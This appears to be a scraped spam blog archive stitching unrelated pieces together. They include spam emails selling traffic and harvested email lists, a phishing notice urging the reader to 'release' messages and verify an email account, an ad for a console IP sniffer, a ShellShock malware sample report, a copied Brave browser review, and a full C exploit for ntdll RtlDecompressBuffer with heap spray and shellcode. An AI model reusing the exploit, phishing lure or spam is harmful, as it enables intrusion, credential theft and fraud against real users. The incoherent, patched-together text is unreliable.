Monday, 29 June 2020
re: Cheap Facebook Traffic
no-veas-la-entrevista.htmlnoreply
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Ryann Raven �
Unsubscribe option is available on the footer of our website
Friday, 26 June 2020
RE: Client details
Would you like to purchase or do email campaign to any of the following email lists collected from LinkedIn, Events, B2B portals etc. ?
- CEO/owner/Presidents email list
- Physicians, Doctors, Nurses, Dentists, Therapists email list
- Hospitals, clinics, private practices, Pharmaceutical and biotechnology company’s top decision makers email list
- Purchasing and Procurement Managers
- CPA and Bookkeepers email list
- Specific Event attendees list
- Architects and interior designers email list8. Government contractors email list9. Engineers email list
- Logistics, shipping and supply chain managers email list
- E-commerce or online retailers email list
- Telecom managers, VOIP managers, Cloud architect, Cloud managers, Storage managers email list
- Facility and office managers email list
- HR Executives List
- Marketing Executives List
- IT Executives email list
- Product or project management list
- General and corporate counsel as well legal professionals list
- Event and meeting planners email list
- High net worth individuals/investors email list
- Individual insurance agents list
- ISV/VARs list
- New & Used Car Dealers email list
- Manufacturing Industry executives list
- Education industry executives email list - Principals, Dean and Admins from Schools, Colleges and Universities
- Specific Technology users list
Thanks and let me know if you wish to see a sample of the database.
Susan William
Email List | Email Campaign | Email Appending | Telemarketing | Lead generation | SEO | Social media Campaign | Video Marketing | Complete Digital Marketing
Thursday, 25 June 2020
Wednesday, 24 June 2020
UNreceived emails from server
Delivery has failed to these recipients or groups:
You have 10 pending messages for delivery to your mail box.
Click here to release these messages to your inbox folder
failure delivery messages | ||||
---|---|---|---|---|
Recipient: | Subject: | Date: | ||
Release |
| FW: RE: RH-22C-20 | 6/24/2020 1:59:17 a.m. | |
Release | aidagorgeous19.syira@blogger.com | RE: Proforma Inv 2020 - GCT // Altan Pharma / 172-40884045 | 6/24/2020 1:59:17 a.m. | |
Release |
| BC-Bahrain MOH Tenders 2020 & 19/2020 | 6/24/2020 1:59:17 a.m. | |
Release |
| FW: SOA- March 2020 | 6/24/2020 1:59:17 a.m. | |
(more...6) |
CHECK aidagorgeous19.syira@blogger.com TO AVOID SHUTDOWN #blogger.com001_27021
AT 6/24/2020 1:53:40 a.m. PLEASE ATTEND TO THIS aidagorgeous19.syira@blogger.com Your email account is currently undergoing an annual upgrade |
To avoid account shut down Please verify your email below to complete this upgrade |
YES, THIS IS MY EMAIL This service is free of charge blogger.com provider ! © 2020 All rights reserved |
Sunday, 21 June 2020
Possible Spam : I hope to hear from you:"
Sunday, 14 June 2020
re: Rank 1st in google with Content Marketing Strategy
Get your business to the next level with a solid Content Marketing strategy
http://www.str8-creative.io/product/content-marketing/
Regards
Nohemi Nimmons
Unsubscribe option is available on the footer of our website
Saturday, 13 June 2020
Friday, 12 June 2020
DOWNLOAD OCTOSNIFF 2.0.3 FULL VERSION – PLAYSTATION AND XBOX IP SNIFFER
FEATURES
- VPN Optimized
- Supports Wireless & Wired Spoofing
- Detects Geo IP and Complete Location
- Searches Usernames of Players in the Lobby
- Really easy to setup
DOWNLOAD OCTOSNIFF 2.0.3 FULL VERSION
More articles
ShellShock Payload Sample Linux.Bashlet
Someone kindly shared their sample of the shellshock malware described by the Malware Must die group - you can read their analysis here:
File: fu4k_2485040231A35B7A465361FAF92A512D
Size: 152
MD5: 2485040231A35B7A465361FAF92A512
VIrustotal
SHA256: e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81
File name: trzA114.tmp
Detection ratio: 22 / 55
Analysis date: 2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )
Antivirus Result Update
Ad-Aware Linux.Backdoor.H 20141002
Avast ELF:Shellshock-A [Expl] 20141002
Avira Linux/Small.152.A 20141002
BitDefender Linux.Backdoor.H 20141002
DrWeb Linux.BackDoor.Shellshock.2 20141002
ESET-NOD32 Linux/Agent.AB 20141002
Emsisoft Linux.Backdoor.H (B) 20141002
F-Secure Linux.Backdoor.H 20141001
Fortinet Linux/Small.CU!tr 20141002
GData Linux.Backdoor.H 20141002
Ikarus Backdoor.Linux.Small 20141002
K7AntiVirus Trojan ( 0001140e1 ) 20141001
K7GW Trojan ( 0001140e1 ) 20141001
Kaspersky Backdoor.Linux.Small.cu 20141001
MicroWorld-eScan Linux.Backdoor.H 20141002
Qihoo-360 Trojan.Generic 20141002
Sophos Linux/Bdoor-BGG 20141002
Symantec Linux.Bashlet 20141002
Tencent Win32.Trojan.Gen.Vdat 20141002
TrendMicro ELF_BASHLET.A 20141002
TrendMicro-HouseCall ELF_BASHLET.A 20141002
nProtect Linux.Backdoor.H 20141001
Read more
Thursday, 11 June 2020
What Is Brave Browser And How Does It Compares To Chrome ?
There are more competing web browsers than ever, with many serving different niches. One example is Brave, which has an unapologetic focus on user privacy and comes with a radical reimagining of how online advertising ought to work.
Brave is based on Chromium, the open-source code that forms the basis for Google Chrome. But is it any good? And for those using Google Chrome, is it worth switching to Brave?
A Brief History of Brave
When Brendan Eich and Brian Bondy founded Brave in 2015, they wanted to address what they perceived as the biggest problem with the modern internet: intrusive advertising.
Advertising is the fuel that powers the modern internet, allowing websites and digital creatives to monetize their content without charging users for each article read or every video watched. That said, Eich and Bondy think it's got some pretty significant downsides, citing the potentially privacy-harming nature of advertising trackers, as well as the negative impact it has on the overall user experience.
Brave's first release came about amidst two significant trends, which ultimately defined the new browser.
First, the cryptocurrency revolution was in full swing. Companies and individuals alike—like the pseudonymous Satoshi Nakamoto—were creating their own decentralized cryptocurrencies, which quickly reached billion-dollar market capitalizations. Second, ad-blocking technology entered the mainstream. By the decade's halfway point, millions of people were blocking ads online across all browsers, desktop, and mobile.
Brave was one of the first browsers to include built advertisement and tracker blockers, leapfrogging the likes of Opera. It also came with its own cryptocurrency, called BAT (or Basic Attention Token), allowing users to reimburse the sites and creators they like.
Essentially, Brave wants to re-imagine how the Internet works: not just on a usability level, but on an economic level. It's an undeniably radical vision, but you wouldn't expect any less, given its founding team.
Brendan Eich is the inventor of the JavaScript programming language and co-founded the Mozilla Foundation, which created the popular Firefox web browser. He also briefly served as the foundation's CEO before resigning following a bitter controversy over his political donations. Brian Bondy is also ex-Mozilla, and spent time at education startup Khan Academy.
Beyond that, Brave is a reasonably standard browser. Like Edge, Chrome, and Opera, it's built upon the Blink rendering engine, which means webpages should work as you expect. Brave is also compatible with Chrome extensions.
To Track or Not to Track?
The Brave browser is characterized by an unapologetically pathological focus on user privacy. Its primary mechanism for delivering this is something called Brave Shields, which combines traditional tracker-blocking technology, paired with several under-the-hood browser configuration tweaks. This feature is turned on by default, although users can easily de-activate it should it cause websites to break.
As you might expect, Brave blocks trackers based on whether they appear in several public blocklists. Going beyond that, it also uses cloud-based machine learning to identify trackers that slipped through the net, in addition to browser-based heuristics.
Brave Shields also forces sites to use HTTPS, where both an encrypted and unencrypted option is available. By forcing users to use an encrypted version of a website, it makes it harder for those on your network to intercept and interfere with the content you visit. While this sounds abstract, it's more common than you think. Public Wi-Fi hotspots, like those found in airports, routinely inject their own ads into websites being visited. Although upgrading to SSL isn't a silver bullet against all security and privacy, it's a pretty significant security upgrade.
Separately from Shields, Brave also includes a built-in TOR browser. TOR allows users to circumvent local censorship — like that which occurs on a national or ISP level — by routing traffic through other computers on its decentralized network.
The tool, which was funded by the US Department of Defence, is frequently used by dissidents living under authoritarian governments to escape surveillance and censorship. Both Facebook and the BBC offer their own TOR 'onion' sites for this reason. Somewhat of a double-edged sword, it's also used by bad actors — drug dealers, hackers, and other online criminals — to operate free from the scrutiny of law enforcement.
Going Batty for BAT
As mentioned, Brave uses its own cryptocurrency, called BAT, for rewarding websites for the content they appreciate. Microtransaction-based tipping is nothing new. Flattr pioneered it almost a decade ago. What's different about BAT is both the implementation and the scale.
While Flattr used traditional fiat-based currencies (by that, I mean currencies like pounds, dollars, and euros), Flattr has its own fungible (essentially, convertible) cryptocurrency based on the Ethereum blockchain. And, as a browser with mainstream aspirations, Brave can deliver this concept to millions of people.
So, let's talk about how it works. Firstly, it's entirely optional. Users can choose to use brave without even touching the BAT micropayments system. By default, it's turned off.
If you decide to opt-in, users can purchase BAT through a cryptocurrency exchange, like Coinbase. They can also earn it by viewing "privacy-respecting" ads. Rather than traditional banner-based advertising, these present as push notifications. Users can choose to dismiss a notification or view it in full-screen.
Unlike traditional advertising networks, the calculations determining what advertisements to show you are performed on your own device. This means the advertiser isn't able to build a profile of you and your interests.
Of all advertising revenue that Brave receives, it shares 70 percent with users, keeping a 30 percent share. It's also worth noting that Brave's advertising program is only available in a handful of countries, mostly scattered across Europe and the Americas, plus Israel, India, Australia, South Africa, the Philippines, Singapore, and New Zealand.
Once you have some BAT, you can spend it. You can choose to automatically contribute to specific sites or tip creators on an ad-hoc basis. You can even tip individual tweets. When you open Twitter through your browser, Brave will automatically add a button to each post within your newsfeed. Pressing it will open a drop-down window, where you confirm your tip.
The sites accepting BAT include The Guardian, The Washington Post, and Slate, as well as popular tech publications like Android Police and The Register. Brave also plans to allow users to spend their rewards for more tangible rewards: like hotel stays, gift cards, and restaurant vouchers. At the time of publication, this system isn't yet available.
How Does Brave Compare to Google Chrome?
Google Chrome commands the majority of the browser market, with other competitors, including Brave, trailing behind. Independent figures about Brave's adoption aren't readily available. It doesn't show on NetMarketShare or W3Counter, as it uses Chrome's user-agent string. In October, however, the company behind Brave reported eight million monthly active users and 2.8 million daily active users.
While that's pocket change in the broader Internet ecosystem, it's still fairly impressive for a young company that's trying to disrupt a market dominated by a small handful of well-entrenched players, like Mozilla, Google, Microsoft, and Apple.
Brave promises to be faster and less energy-intensive than rival browsers, and it delivers on this. Scientific benchmarks, plus my own anecdotal experiences, pay testament to this. Furthermore, when you open a new tab, Brave shows you how much time you've saved by using it.
However, there are small annoyances you perhaps wouldn't get with other browsers. Functionality that comes standard in Chrome, like the ability to automatically translate webpages, is only available through plug-ins.
You also occasionally encounter webpages that force you to "drop" your shield to access it. And while this isn't Brave's fault, it does highlight the fact that a huge part of the conventional Internet isn't quite prepared to embrace its utopian vision of how content should be monetized.
A Brave New World?
Should you ditch Google Chrome for Brave? Maybe. There's a lot to appreciate about this browser. While it's generally fast, it also feels extremely polished. I appreciate the fact that it comes with both light and dark themes and the ease in which it allows users to protect their privacy from cross-site trackers.
But Brave is more than a browser. It's a statement about how the Internet should work. And while most people will agree that the pace and scale of online tracking should be rolled back, many may disagree whether cryptocurrencies are the best way to monetize content that is otherwise funded by traditional in-browser advertising. And are push notification-based advertisements on your desktop really a less irritating form of advertising?
Ultimately, the question is whether you agree with Brave's approach or not.
@£√£RYTHING NT
Related articles
RtlDecompresBuffer Vulnerability
The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.
The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.
The algorithms callback table
Notice the five nops at the end probably for adding new algorithms in the future.
The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]
The bounrady checks
We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:
int RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@4
if ( algorithm & algorithm != 1 )
{
if ( algorithm & 0xF0 )
result = -1073741217;
else
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
}
else
{
result = -1073741811;
}
return result;
}
let's check the disassembly on Win7 32bits:
- the movzx limits the boundaries to 16bits
- the test ax, ax avoids the algorithm 0
- the cmp ax, 1 avoids the algorithm 1
- the test al, 0F0h limits the boundary .. wait .. al?
Let's calc the max two bytes number that bypass the test al, F0h
unsigned int max(void) {
__asm__("xorl %eax, %eax");
__asm__("movb $0xff, %ah");
__asm__("movb $0xf0, %al");
}
int main(void) {
printf("max: %u\n", max());
}
/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder
*/
#include
#include
#include
#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9
// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/
// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits
void fail(const char *msg) {
printf("%s\n\n", msg);
exit(1);
}
PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;
printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);
while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);
}
//map = HeapAlloc(heap, 0, 1*MB);
printf("Aproximated to [%x - %x]\n", map, map+1*MB);
printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);
return map;
}
void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);
}
void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));
}
int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
NTSTATUS ntStat;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;
RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");
heap = GetProcessHeap();
compressed_sz = estimated_uncompressed_sz = 1*KB;
compressed = HeapAlloc(heap, 0, compressed_sz);
uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);
spray(heap);
copy_shellcode();
//landing_sigtrap(1*KB);
printf("Landing ...\n");
ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);
switch(ntStat) {
case STATUS_SUCCESS:
printf("decompression Ok!\n");
break;
case STATUS_INVALID_PARAMETER:
printf("bad compression parameter\n");
break;
case STATUS_UNSUPPORTED_COMPRESSION:
printf("unsuported compression\n");
break;
case STATUS_BAD_COMPRESSION_BUFFER:
printf("Need more uncompressed buffer\n");
break;
default:
printf("weird decompression state\n");
break;
}
printf("end.\n");
}
More infoThis API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
The Live HTML Editor
- Live HTML preview of whatever HTML you type.
- Supports HTML Syntax Highlighting.
- Supports opening an HTML file and Live Preview editing of that file.
- Supports Saving files.
- Support for inline and embedded CSS.
The Live HTML Editor is Free and Opensource project and has been written in Python with QT interface you can check out source from sourceforge.
Related word
Fragroute
Website: http://monkey.org/~dugsong/fragroute
Related articles
Does Your Health Need Attention? (10 Clues)
|